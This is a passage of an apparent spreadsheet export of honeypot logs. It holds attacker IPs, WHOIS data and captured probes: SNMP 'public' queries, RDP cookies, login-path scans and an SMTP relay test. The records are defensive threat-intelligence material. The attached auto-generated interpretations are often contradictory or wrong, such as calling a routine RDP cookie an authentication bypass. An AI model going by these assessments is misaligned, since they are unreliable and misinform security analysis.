    <t>No TELNET activity detected, indicating a lack of attempted login attempts via this service.
TELNET is typically used for remote access to systems, so its absence may indicate secure configuration or minimal exposure to the internet.
However, this alone does not necessarily suggest malicious activity. &amp;&amp; This log indicates that the service is unavailable for TELNET connections, suggesting potential scanning or probing activity by an attacker to identify available services. The absence of a response from the service could be due to a denial-of-service attack or a deliberate attempt to exploit vulnerabilities. This may be indicative of reconnaissance efforts by malicious actors.</t>
  </si>
  <si>
    <t>Port Scan &amp;&amp; Port scan</t>
  </si>
  <si>
    <t>69f46dde6874bd4f44025f0348657377</t>
  </si>
  <si>
    <t>27.96.225.238</t>
  </si>
  <si>
    <t>27-96-225-238.veetime.com</t>
  </si>
  <si>
    <t>17809</t>
  </si>
  <si>
    <t>VEETIME-TW-AP</t>
  </si>
  <si>
    <t>Emax</t>
  </si>
  <si>
    <t>VMAX Telecom Co., Ltd</t>
  </si>
  <si>
    <t>2009-11-27 10:29:39</t>
  </si>
  <si>
    <t>2027-11-27 10:29:39</t>
  </si>
  <si>
    <t>2024-09-30 09:33:59</t>
  </si>
  <si>
    <t>['NS1.EMAX.NET.TW', 'NS2.EMAX.NET.TW']</t>
  </si>
  <si>
    <t>['foreign@net-chinese.com.tw', 'MIS3@markwell.com.tw', 'hostmaster@net-chinese.com.tw']</t>
  </si>
  <si>
    <t>::ffff:1b60:e1ee</t>
  </si>
  <si>
    <t>0de610332cd573a722eafd4ba77a2eca</t>
  </si>
  <si>
    <t>139.162.187.200</t>
  </si>
  <si>
    <t>139-162-187-200.ip.linodeusercontent.com</t>
  </si>
  <si>
    <t>Frankfurt am Main</t>
  </si>
  <si>
    <t>60313</t>
  </si>
  <si>
    <t>50.1109</t>
  </si>
  <si>
    <t>8.68213</t>
  </si>
  <si>
    <t>2019-12-18 18:38:04</t>
  </si>
  <si>
    <t>2026-12-18 18:38:04</t>
  </si>
  <si>
    <t>2023-03-15 12:08:41</t>
  </si>
  <si>
    <t>['A1-249.AKAM.NET', 'A12-65.AKAM.NET', 'A16-64.AKAM.NET', 'A3-67.AKAM.NET', 'A4-64.AKAM.NET', 'A7-65.AKAM.NET']</t>
  </si>
  <si>
    <t>['abusecomplaints@markmonitor.com', 'whoisrequest@markmonitor.com']</t>
  </si>
  <si>
    <t>::ffff:8ba2:bbc8</t>
  </si>
  <si>
    <t>A user with a Windows system is attempting to log in using an outdated version of Google Chrome from within the browser itself. This may be a brute force attack or unauthorized access attempt. User's IP address and location are likely being masked. &amp;&amp; Possible malicious activity: An attempt to login with a fake user agent string from an IP address suggesting a Windows 10 system attempting to impersonate legitimate web browser behavior. The fake user agent may be used to evade detection or bypass security measures.</t>
  </si>
  <si>
    <t>46884978690f15e8ce1efafb6b9caa25</t>
  </si>
  <si>
    <t>198.235.24.131</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_FTP_H7&amp;&amp;SMA-LAB_IMAP_H7&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_MYSQL_H5&amp;&amp;SMA-LAB_SOCKS5_H12&amp;&amp;SMA-LAB_MYSQL_H23&amp;&amp;SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_PJL_H36&amp;&amp;SMA-LAB_PJL_H9&amp;&amp;SMA-LAB_FTP_H40&amp;&amp;SMA-LAB_FTP_H33&amp;&amp;SMA-LAB_PJL_H17&amp;&amp;SMA-LAB_PJL_H5&amp;&amp;SMA-LAB_VNC_H9&amp;&amp;SMA-LAB_VNC_H15&amp;&amp;SMA-LAB_IMAP_H15&amp;&amp;SMA-LAB_TELNET_H18&amp;&amp;SMA-LAB_FTP_H9&amp;&amp;SMA-LAB_NTP_H8&amp;&amp;SMA-LAB_LDAP_H9&amp;&amp;SMA-LAB_SOCKS5_H27&amp;&amp;SMA-LAB_SOCKS5_H41&amp;&amp;SMA-LAB_SOCKS5_H46&amp;&amp;SMA-LAB_VNC_H37&amp;&amp;SMA-LAB_VNC_H40&amp;&amp;SMA-LAB_LDAP_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_FTP_H19&amp;&amp;SMA-LAB_MYSQL_H39&amp;&amp;SMA-LAB_MSSQL_H24&amp;&amp;SMA-LAB_ORACLE_H3&amp;&amp;SMA-LAB_POSTGRES_H35&amp;&amp;SMA-LAB_SOCKS5_H22&amp;&amp;SMA-LAB_SNMP_H6&amp;&amp;SMA-LAB_SNMP_H23&amp;&amp;SMA-LAB_LDAP_H31&amp;&amp;SMA-LAB_PJL_H37&amp;&amp;SMA-LAB_RDP_H41&amp;&amp;SMA-LAB_REDIS_H36&amp;&amp;SMA-LAB_NTP_H40&amp;&amp;SMA-LAB_SMB_H25&amp;&amp;SMA-LAB_SMB_H41&amp;&amp;SMA-LAB_SOCKS5_H28</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;21&amp;&amp;143&amp;&amp;3389&amp;&amp;3306&amp;&amp;1080&amp;&amp;22&amp;&amp;45404&amp;&amp;9100&amp;&amp;5900&amp;&amp;23&amp;&amp;NA&amp;&amp;1433&amp;&amp;1521&amp;&amp;5432&amp;&amp;161&amp;&amp;6379&amp;&amp;445&amp;&amp;110&amp;&amp;443&amp;&amp;80&amp;&amp;63566&amp;&amp;389&amp;&amp;63590&amp;&amp;6667&amp;&amp;54527</t>
  </si>
  <si>
    <t>connection&amp;&amp;command&amp;&amp;stshash&amp;&amp;query&amp;&amp;GET&amp;&amp;NA</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_IMAP:{'cmd': 'CAPABILITY', 'data': 'None', 'tag': 'a001'}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=ZNaGeNbQu'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=lVQRhQGFd'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=KDerkb'}}&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=kkFWmL'}}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_FTP:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1', 'version': '1'}}&amp;&amp;{Data_HTTPS:{'Host': '194-146-12-172.plesk.page', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': 'Expanse, a Palo Alto Networks company, searches across the global IPv4 space multiple times per day to identify customers&amp;#39; presences on the Internet. If you would like to be excluded from our scans, please send IP addresses/domains to: scaninfo@paloaltonetworks.com', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_LDAP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_VNC:NA}&amp;&amp;{Data_IRC:NA}</t>
  </si>
  <si>
    <t>::ffff:c6eb:1883</t>
  </si>
  <si>
    <t>The system is unable to collect SNMP logs, potentially indicating a security issue with monitoring capabilities or access restrictions. This could be due to misconfigured settings or deliberate attempts to evade detection. Monitoring data loss may indicate malicious activity attempting to remain undetected. &amp;&amp; Unauthorized access to the network is detected, likely a reconnaissance attempt, with an attacker attempting to retrieve system information using default credentials. The attacker has attempted to use publicly available SNMP community string 'public'. This suggests a potential vulnerability in network security configuration.</t>
  </si>
  <si>
    <t>Network Scan</t>
  </si>
  <si>
    <t>798bfb0a11017901f9cd66cdd51f7764</t>
  </si>
  <si>
    <t>183.82.122.104</t>
  </si>
  <si>
    <t>Medchal Malkajgiri</t>
  </si>
  <si>
    <t>Secunderabad</t>
  </si>
  <si>
    <t>1256922</t>
  </si>
  <si>
    <t>500003</t>
  </si>
  <si>
    <t>17.4399</t>
  </si>
  <si>
    <t>78.4983</t>
  </si>
  <si>
    <t>18209</t>
  </si>
  <si>
    <t>CABLELITE-AS-AP</t>
  </si>
  <si>
    <t>Beam Telecom Pvt Ltd</t>
  </si>
  <si>
    <t>::ffff:b752:7a68</t>
  </si>
  <si>
    <t>No VNC login attempt was made, but the service remains active. This could indicate idle scanning or reconnaissance by an attacker checking for vulnerable services. The lack of a login attempt suggests the attacker may have been probing rather than actively trying to exploit the service. &amp;&amp; No VNC (Virtual Network Computing) activity detected, which could indicate that the system is being tested for vulnerabilities or waiting for user interaction to exploit it further. 
A potential attack vector is being kept open and unused for now.
This inactivity might be a tactic to remain stealthy while keeping options open for future exploitation.</t>
  </si>
  <si>
    <t>6d8846520e94eec5656b01a643f9fdb1</t>
  </si>
  <si>
    <t>114.33.113.102</t>
  </si>
  <si>
    <t>114-33-113-102.hinet-ip.hinet.net&amp;&amp;NA</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H14&amp;&amp;SMA-LAB_LDAP_H38&amp;&amp;SMA-LAB_SMB_H17&amp;&amp;SMA-LAB_HTTPS_H4&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_IPP_H47&amp;&amp;SMA-LAB_SOCKS5_H7&amp;&amp;SMA-LAB_MT-CPA_H36&amp;&amp;SMA-LAB_TELNET_H37&amp;&amp;SMA-LAB_TELNET_H39&amp;&amp;SMA-LAB_TELNET_H35&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H29&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_H38&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H40&amp;&amp;SMA-LAB_TELNET_H41&amp;&amp;SMA-LAB_TELNET_H13&amp;&amp;SMA-LAB_TELNET_H46&amp;&amp;SMA-LAB_TELNET_H8&amp;&amp;SMA-LAB_TELNET_H34&amp;&amp;SMA-LAB_TELNET_H17&amp;&amp;SMA-LAB_TELNET_H11&amp;&amp;SMA-LAB_TELNET_H10&amp;&amp;SMA-LAB_TELNET_H26&amp;&amp;SMA-LAB_TELNET_H47&amp;&amp;SMA-LAB_TELNET_H23&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H44&amp;&amp;SMA-LAB_TELNET_H6&amp;&amp;SMA-LAB_TELNET_H15</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;389&amp;&amp;445&amp;&amp;443&amp;&amp;22&amp;&amp;631&amp;&amp;1080&amp;&amp;51738&amp;&amp;23&amp;&amp;41094&amp;&amp;NA&amp;&amp;9100</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.26.156.60:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '154.93.37.45:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Connection': 'close', 'Host': '38.60.224.106:80', 'User-Agent': 'curl/7.88.1', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_PJL:NA}</t>
  </si>
  <si>
    <t>::ffff:7221:7166</t>
  </si>
  <si>
    <t>e3d9047e87d9f6299cb525197dc4d8f9</t>
  </si>
  <si>
    <t>66.63.187.201</t>
  </si>
  <si>
    <t>Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Session Manipulation&amp;&amp;Email Spoofing&amp;&amp;Spam Message Body&amp;&amp;Credential Stuffing</t>
  </si>
  <si>
    <t>SMA-LAB_SMTP_HC1&amp;&amp;SMA-LAB_SMTP_H4</t>
  </si>
  <si>
    <t>{Data_SMTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'RSET', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'from:&lt;spameri@tiscali.it&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'to:&lt;spameri@tiscali.it&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'DATA', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000D_
Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000D_
To: spameri@tiscali.it_x000D_
Date: Wed, 16 Apr 2025 10:09:30 -0700_x000D_
X-Priority: 3_x000D_
X-Library: Indy 8.0.25_x000D_
_x000D_
t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'None', 'command': 'QUIT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'LOGIN', 'command': 'AUTH', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;mrpeterjohn003@hotmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;NA</t>
  </si>
  <si>
    <t>::ffff:423f:bbc9</t>
  </si>
  <si>
    <t>The attacker is attempting to gather information about the system and services available, likely for reconnaissance purposes. They are probing various protocols and ports to identify potential vulnerabilities and entry points. &amp;&amp; The attackers are scanning and probing the network for vulnerable services, attempting to gain unauthorized access through various protocols such as DHCP, DNS, FTP, HTTP, HTTPS, IMAP, IPP, IRC, LDAP, MSSQL, MYSQL, NTP, Oracle, PJL, POP3, RDP, REDIS, SIP, SMB, SMTP, SNMP. &amp;&amp; There is insufficient data to analyze. 
The provided log data does not contain any information about potential malicious activity.
It appears that there are no records of attempts or connections to the monitored services.</t>
  </si>
  <si>
    <t xml:space="preserve"> Phishing Attack &amp;&amp;  </t>
  </si>
  <si>
    <t>377cd46f2fe00c8f1d8df0d12a1e091b</t>
  </si>
  <si>
    <t>119.17.222.92</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_MT-CPA_H28&amp;&amp;SMA-LAB_MSSQL_H2&amp;&amp;SMA-LAB_MSSQL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;48779&amp;&amp;1433&amp;&amp;NA</t>
  </si>
  <si>
    <t>Cầu Giấy District</t>
  </si>
  <si>
    <t>Cầu Giấy</t>
  </si>
  <si>
    <t>8616113</t>
  </si>
  <si>
    <t>21.0469</t>
  </si>
  <si>
    <t>105.8</t>
  </si>
  <si>
    <t>24173</t>
  </si>
  <si>
    <t>Netnam Company</t>
  </si>
  <si>
    <t>Netnam Corporation</t>
  </si>
  <si>
    <t>NETNAM</t>
  </si>
  <si>
    <t>2007-12-07</t>
  </si>
  <si>
    <t>NETNAM-VN</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_DHCP:{'53': 'x08', '55': 'x01x02x03x04x05x06x07x08	
x0bx0c_x000D_x0ex0fx10x11x12x13x14x15x16x17x18x19x1ax1bx1cx1dx1ex1f !&amp;&amp;{Data_MSSQl:NA}</t>
  </si>
  <si>
    <t>::ffff:7711:de5c</t>
  </si>
  <si>
    <t>No SQL injection attempt detected, but possible malicious activity is related to database service access. 
The attacker seems to be probing for potential vulnerabilities or testing service availability. No actual SQL query was issued.</t>
  </si>
  <si>
    <t>7c65872ac158e735b894026ec381f69c</t>
  </si>
  <si>
    <t>79.57.59.53</t>
  </si>
  <si>
    <t>SMA-LAB_HTTPS_H36&amp;&amp;SMA-LAB_HTTPS_HC1</t>
  </si>
  <si>
    <t>443&amp;&amp;8443</t>
  </si>
  <si>
    <t>Lombardy</t>
  </si>
  <si>
    <t>Province of Brescia</t>
  </si>
  <si>
    <t>Brescia</t>
  </si>
  <si>
    <t>3181554</t>
  </si>
  <si>
    <t>25100</t>
  </si>
  <si>
    <t>45.5416</t>
  </si>
  <si>
    <t>10.2118</t>
  </si>
  <si>
    <t>2007-02-21</t>
  </si>
  <si>
    <t>{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '5.182.38.84', 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': 'text/plain,text/html', 'Host': '103.211.202.140', 'method': 'GET', 'uri': '/'}}</t>
  </si>
  <si>
    <t>::ffff:4f39:3b35</t>
  </si>
  <si>
    <t>A GET request was made to the root directory of a server, indicating potential reconnaissance activity. The request included an Accept header that suggests the attacker may be looking for a specific type of content. This could be a probe to gather information about the server's configuration and capabilities. &amp;&amp; The data suggests an incoming GET request from IP address 103.211.202.140, targeting the root directory of the server with potentially malicious intent to retrieve sensitive information or exploit vulnerabilities. The Accept header indicates the client can handle plain text and HTML responses. This may indicate a reconnaissance attempt or a probe for potential weaknesses in the server's configuration.</t>
  </si>
  <si>
    <t>a6b52a938fa8dc713c88ff04b4195289</t>
  </si>
  <si>
    <t>117.221.119.248</t>
  </si>
  <si>
    <t>::ffff:75dd:77f8</t>
  </si>
  <si>
    <t>bc6f0bf9aef68fb777a33e0b8aedce1d</t>
  </si>
  <si>
    <t>117.206.129.68</t>
  </si>
  <si>
    <t>::ffff:75ce:8144</t>
  </si>
  <si>
    <t>3c4928d13249cbc4e3aca1315bf212b6</t>
  </si>
  <si>
    <t>117.255.178.158</t>
  </si>
  <si>
    <t>::ffff:75ff:b29e</t>
  </si>
  <si>
    <t>a264c8c5b79e8dbed0a73a5df0564105</t>
  </si>
  <si>
    <t>83.105.146.166</t>
  </si>
  <si>
    <t>5378</t>
  </si>
  <si>
    <t>unspecified</t>
  </si>
  <si>
    <t>Vodafone</t>
  </si>
  <si>
    <t>::ffff:5369:92a6</t>
  </si>
  <si>
    <t>c0d3bedc44116b45591af154c8488dcd</t>
  </si>
  <si>
    <t>115.243.149.179</t>
  </si>
  <si>
    <t>SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MSSQL_H13</t>
  </si>
  <si>
    <t>::ffff:73f3:95b3</t>
  </si>
  <si>
    <t>Potential malicious activity detected, possible attempt to access or exploit Microsoft SQL Server.
Malicious actor may be trying to inject malicious code or gain unauthorized access to database.
This could lead to data theft or disruption of service.</t>
  </si>
  <si>
    <t>bad711ede5092a25aa541f340d333c56</t>
  </si>
  <si>
    <t>86.96.192.84</t>
  </si>
  <si>
    <t>SMA-LAB_MT-CPA_H9&amp;&amp;SMA-LAB_RDP_H25&amp;&amp;SMA-LAB_RDP_H6&amp;&amp;SMA-LAB_RDP_H27&amp;&amp;SMA-LAB_RDP_H33&amp;&amp;SMA-LAB_RDP_H36&amp;&amp;SMA-LAB_RDP_H30&amp;&amp;SMA-LAB_RDP_H16&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MYSQL_H6&amp;&amp;SMA-LAB_MYSQL_H16&amp;&amp;SMA-LAB_MYSQL_H33&amp;&amp;SMA-LAB_MYSQL_H25&amp;&amp;SMA-LAB_MYSQL_H36&amp;&amp;SMA-LAB_MYSQL_H27&amp;&amp;SMA-LAB_RDP_H35&amp;&amp;SMA-LAB_MYSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_RDP_H31</t>
  </si>
  <si>
    <t>32979&amp;&amp;3389&amp;&amp;40125&amp;&amp;3306&amp;&amp;50731&amp;&amp;52765&amp;&amp;5432&amp;&amp;46410&amp;&amp;44536&amp;&amp;52793&amp;&amp;5900&amp;&amp;50458&amp;&amp;59005&amp;&amp;53717</t>
  </si>
  <si>
    <t>Abu Dhabi</t>
  </si>
  <si>
    <t>292968</t>
  </si>
  <si>
    <t>24.4539</t>
  </si>
  <si>
    <t>54.3773</t>
  </si>
  <si>
    <t>EMIRATES TELECOMMUNICATIONS GROUP COMPANY (ETISALAT GROUP) PJSC</t>
  </si>
  <si>
    <t>2005-04-20</t>
  </si>
  <si>
    <t>stshash&amp;&amp;connection&amp;&amp;NA&amp;&amp;login</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_RDP:{'stshash': 'Cookie: mstshash=hello'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_VNC:NA}</t>
  </si>
  <si>
    <t>::ffff:5660:c054</t>
  </si>
  <si>
    <t>Possible malicious activity is an attempt to access Remote Desktop service. This may indicate a brute force attack or unauthorized access attempt. No successful login was detected, as indicated by the NA status. &amp;&amp; A malicious actor is attempting to bypass authentication by modifying the Remote Desktop Protocol (RDP) hash cookie with a hardcoded value, indicating an attempt to access the system without proper authorization. This could be part of a larger attack to gain unauthorized access to sensitive systems or data. The modified hash cookie suggests an attempt to evade detection. &amp;&amp; Possible reconnaissance attempt to extract server information, potentially for future exploitation or password cracking. Malicious actor trying to gather information about the target system. Server hash likely being targeted.</t>
  </si>
  <si>
    <t>fc950249342ba33f2f40be9b7610fe25</t>
  </si>
  <si>
    <t>104.234.115.7</t>
  </si>
  <si>
    <t>NA&amp;&amp;crawler007.deepfield.net</t>
  </si>
  <si>
    <t>SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_REDIS_H11&amp;&amp;SMA-LAB_REDIS_H24&amp;&amp;SMA-LAB_HTTPS_H26&amp;&amp;SMA-LAB_MT-CPA_H4&amp;&amp;SMA-LAB_NTP_H39&amp;&amp;SMA-LAB_PJL_HC1</t>
  </si>
  <si>
    <t>53&amp;&amp;137&amp;&amp;67&amp;&amp;6667&amp;&amp;6379&amp;&amp;443&amp;&amp;38247&amp;&amp;NA&amp;&amp;123&amp;&amp;9100&amp;&amp;56166&amp;&amp;3389&amp;&amp;1080&amp;&amp;110&amp;&amp;5432&amp;&amp;1433&amp;&amp;161&amp;&amp;3306&amp;&amp;1521&amp;&amp;21587&amp;&amp;143&amp;&amp;21719&amp;&amp;23&amp;&amp;80</t>
  </si>
  <si>
    <t>connection&amp;&amp;NA&amp;&amp;query&amp;&amp;login&amp;&amp;GET</t>
  </si>
  <si>
    <t>NA&amp;&amp;{Data_PJL:NA}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SOCKS5:NA}&amp;&amp;{Data_REDIS:NA}&amp;&amp;{Data_PJL:{'command': '                    '}}&amp;&amp;{Data_POP3:NA}&amp;&amp;{Data_POSTGRES:NA}&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_SNMP:NA}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.3.6.1.2.1.1.1.0 1.3.6.1.2.1.1.5.0', 'version': '0'}}&amp;&amp;{Data_SNMP:{'community': 'public', 'oids': '1.0', 'version': '1'}}&amp;&amp;{Data_MYSQL:NA}&amp;&amp;{Data_ORACLE:NA}&amp;&amp;{Data_IMAP:NA}&amp;&amp;{Data_TELNET:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/cgi-bin/login.cgi'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.htm'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.htm'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/doc/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/remote/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/remote/login'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '//admin/login.asp'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/web/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '194.4.48.242', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/web/'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.255.123.181', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/'}}&amp;&amp;{Data_HTTPS:NA}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/index.html'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_HTTPS:{'Accept': '*/*', 'Accept-Encoding': 'gzip', 'Host': '185.234.67.80', 'User-Agent': Mozilla/5.0 (compatible; GenomeCrawlerd/1.0; +https://www.nokia.com/genomecrawler), 'method': 'GET', 'uri': '/favicon.ico'}}&amp;&amp;{Data_IRC:NA}</t>
  </si>
  <si>
    <t>::ffff:68ea:7307</t>
  </si>
  <si>
    <t>e7e01ca777660261c17ee6e78acf96d5</t>
  </si>
  <si>
    <t>59.91.96.184</t>
  </si>
  <si>
